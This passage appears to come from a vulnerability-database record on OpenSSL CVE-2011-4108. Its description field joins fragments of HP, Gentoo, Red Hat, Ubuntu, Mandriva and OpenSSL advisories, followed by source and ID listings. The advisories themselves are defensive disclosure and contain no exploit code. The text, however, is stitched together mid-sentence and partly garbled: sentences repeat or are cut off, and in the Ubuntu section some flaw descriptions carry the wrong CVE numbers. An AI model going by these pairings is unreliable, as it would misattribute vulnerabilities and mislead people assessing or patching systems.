(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2\nCVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6\nCVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided HP System Management Homepage v7.1.1 or subsequent to resolve\nthe vulnerabilities. HP System Management Homepage v7.1.1 is available here:\n\nHP System Management Homepage for Windows x64\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab\n0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Windows x86\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7\nc0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (AMD64/EM64T)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18\nd373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (x86)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4006%257CswLang%253D8%257CswItem%253DMTX-9e\n8a0188f97d48139dcb466509%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHISTORY\nVersion:1 (rev.1) 26 June 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated\nperiodically, is contained in HP Security Notice HPSN-2011-001:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201203-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: March 06, 2012\n Bugs: #397695, #399365\n ID: 201203-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, allowing remote\nattackers to cause a Denial of Service or obtain sensitive information. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.0g *\u003e= 0.9.8t\n \u003e= 1.0.0g\n\nDescription\n===========\n\nMultiple vulnerabilities have been found in OpenSSL:\n\n* Timing differences for decryption are exposed by CBC mode encryption\n in OpenSSL\u0027s implementation of DTLS (CVE-2011-4108). \n* An incorrect fix for CVE-2011-4108 creates an unspecified\n vulnerability for DTLS applications using OpenSSL (CVE-2012-0050). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.0g\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-4108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108\n[ 2 ] CVE-2011-4109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109\n[ 3 ] CVE-2011-4576\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576\n[ 4 ] CVE-2011-4577\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577\n[ 5 ] CVE-2011-4619\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619\n[ 6 ] CVE-2012-0027\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027\n[ 7 ] CVE-2012-0050\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201203-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL\u0027s I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. \n\nWarning: Before applying the update, back up your existing JBoss Enterprise\nWeb Server installation (including all applications and configuration\nfiles). \n\nAll users of JBoss Enterprise Web Server 1.0.2 for Solaris and Microsoft\nWindows as provided from the Red Hat Customer Portal are advised to apply\nthis update. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting JBoss Enterprise Web Server installation (including all\napplications and configuration files). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2012:0059-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html\nIssue date: 2012-01-24\nCVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 \n CVE-2011-4619 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nIt was discovered that the Datagram Transport Layer Security (DTLS)\nprotocol implementation in OpenSSL leaked timing information when\nperforming certain operations. A remote attacker could possibly use this\nflaw to retrieve plain text from the encrypted packets by using a DTLS\nserver as a padding oracle. (CVE-2011-4108)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection. \n(CVE-2011-4576)\n\nA denial of service flaw was found in the RFC 3779 implementation in\nOpenSSL. A remote attacker could use this flaw to make an application using\nOpenSSL exit unexpectedly by providing a specially-crafted X.509\ncertificate that has malformed RFC 3779 extension data. (CVE-2011-4577)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake. \n(CVE-2011-4619)\n\nAll OpenSSL users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\n\nppc64:\nopenssl-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-devel-1.0.0-20.el6_2.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.0-20.el6_2.1.s390.rpm\nopenssl-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-devel-1.0.0-20.el6_2.1.s390.rpm\nopenssl-devel-1.0.0-20.el6_2.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-static-1.0.0-20.el6_2.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-perl-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-static-1.0.0-20.el6_2.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-4108.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4576.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4577.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4619.html\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3\nCJl5iUxU4cxJLOsSBESSRVs=\n=PMiS\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-1357-1\nFebruary 09, 2012\n\nopenssl vulnerabilities\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n- Ubuntu 8.04 LTS\n\nSummary:\n\nMultiple vulnerabilities exist in OpenSSL that could expose\nsensitive information or cause applications to crash. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) binary and related cryptographic tools\n\nDetails:\n\nIt was discovered that the elliptic curve cryptography (ECC) subsystem\nin OpenSSL, when using the Elliptic Curve Digital Signature Algorithm\n(ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement\ncurves over binary fields. This could allow an attacker to determine\nprivate keys via a timing attack. This issue only affected Ubuntu 8.04\nLTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)\n\nAdam Langley discovered that the ephemeral Elliptic Curve\nDiffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread\nsafety while processing handshake messages from clients. This\ncould allow a remote attacker to cause a denial of service via\nout-of-order messages that violate the TLS protocol. This issue only\naffected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu\n11.04. This could allow a remote\nattacker to recover plaintext. This could allow a remote\nattacker to cause a denial of service. This\ncould allow a remote attacker to cause a denial of service. This\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. (CVE-2011-4109)\n\nIt was discovered that OpenSSL, in certain circumstances involving\nECDH or ECDHE cipher suites, used an incorrect modular reduction\nalgorithm in its implementation of the P-256 and P-384 NIST elliptic\ncurves. This issue only\naffected Ubuntu 8.04 LTS. (CVE-2011-4576)\n\nAndrew Chi discovered that OpenSSL, when RFC 3779 support is enabled,\ncould trigger an assert when handling an X.509 certificate containing\ncertificate-extension data associated with IP address blocks or\nAutonomous System (AS) identifiers. This could allow a remote attacker\nto cause a denial of service. This could allow a remote attacker to cause a denial of\nservice. (CVE-2011-4619)\n\nAndrey Kulikov discovered that the GOST block cipher engine in OpenSSL\ndid not properly handle invalid parameters. This could allow a remote\nattacker to cause a denial of service via crafted data from a TLS\nclient. This issue only affected Ubuntu 11.10. (CVE-2012-0027)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 11.10:\n libssl1.0.0 1.0.0e-2ubuntu4.2\n openssl 1.0.0e-2ubuntu4.2\n\nUbuntu 11.04:\n libssl0.9.8 0.9.8o-5ubuntu1.2\n openssl 0.9.8o-5ubuntu1.2\n\nUbuntu 10.10:\n libssl0.9.8 0.9.8o-1ubuntu4.6\n openssl 0.9.8o-1ubuntu4.6\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.8\n openssl 0.9.8k-7ubuntu8.8\n\nUbuntu 8.04 LTS:\n libssl0.9.8 0.9.8g-4ubuntu3.15\n openssl 0.9.8g-4ubuntu3.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFPFFiBmqjQ0CJFipgRAkIUAJ9foScZELNgGkHUEaaSx9sgdWNMFwCgnsst\neph27yO3eEECVX28+SNUKyw=\n=wTFq\n-----END PGP SIGNATURE-----\n. Their attack exploits timing differences arising during\ndecryption processing. A research paper describing this attack can be\nfound at http://www.isg.rhul.ac.uk/~kp/dtls.pdf\n\nThanks go to Nadhem Alfardan and Kenny Paterson of the Information\nSecurity Group at Royal Holloway, University of London\n(www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann\n\u003cseggelmann@fh-muenster.de\u003e and Michael Tuexen \u003ctuexen@fh-muenster.de\u003e\nfor preparing the fix. \n\nDouble-free in Policy Checks (CVE-2011-4109)\n============================================\n\nIf X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8, then a policy\ncheck failure can lead to a double-free. The bug does not occur \nunless this flag is set. Users of OpenSSL 1.0.0 are not affected. \n\nThis flaw was discovered by Ben Laurie and a fix provided by Emilia\nKasper \u003cekasper@google.com\u003e of Google. This affects both clients and\nservers that accept SSL 3.0 handshakes: those that call SSL_CTX_new with\nSSLv3_{server|client}_method or SSLv23_{server|client}_method. It does\nnot affect TLS. This could include sensitive\ncontents of previously freed memory. \n\nHowever, in practice, most deployments do not use\nSSL_MODE_RELEASE_BUFFERS and therefore have a single write buffer per\nconnection. That write buffer is partially filled with non-sensitive,\nhandshake data at the beginning of the connection and, thereafter,\nonly records which are longer any any previously sent record leak any\nnon-encrypted data. This, combined with the small number of bytes\nleaked per record, serves to limit to severity of this issue. \n\nThanks to Adam Langley \u003cagl@chromium.org\u003e for identifying and fixing\nthis issue. \n\nMalformed RFC 3779 Data Can Cause Assertion Failures (CVE-2011-4577)\n====================================================================\n\nRFC 3779 data can be included in certificates, and if it is malformed,\nmay trigger an assertion failure. This could be used in a\ndenial-of-service attack. \n\nNote, however, that in the standard release of OpenSSL, RFC 3779\nsupport is disabled by default, and in this case OpenSSL is not\nvulnerable. Builds of OpenSSL are vulnerable if configured with \n\"enable-rfc3779\". \n\nThanks to Andrew Chi, BBN Technologies, for discovering the flaw, and\nRob Austein \u003csra@hactrn.net\u003e for fixing it. \n\nThanks to George Kadianakis \u003cdesnacked@gmail.com\u003e for identifying\nthis issue and to Adam Langley \u003cagl@chromium.org\u003e for fixing it. \n\nInvalid GOST parameters DoS Attack (CVE-2012-0027)\n===================================================\n\nA malicious TLS client can send an invalid set of GOST parameters\nwhich will cause the server to crash due to lack of error checking. \nThis could be used in a denial-of-service attack. \n\nOnly users of the OpenSSL GOST ENGINE are affected by this bug. \n\nThanks to Andrey Kulikov \u003camdeich@gmail.com\u003e for identifying and fixing\nthis issue. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20120104.txt\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4108" }, { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "VULMON", "id": "CVE-2011-4108" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "169679" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4108", "trust": 2.9 }, { "db": "CERT/CC", "id": "VU#737740", "trust": 2.2 }, { "db": "SECUNIA", "id": "57260", "trust": 1.1 }, { "db": "SECUNIA", "id": "48528", "trust": 1.1 }, { "db": "SECUNIA", "id": "57353", "trust": 1.1 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201201-057", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "BID", "id": "51281", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2011-4108", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116124", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114272", "trust": 0.1 }, { "db": "PACKETSTORM", 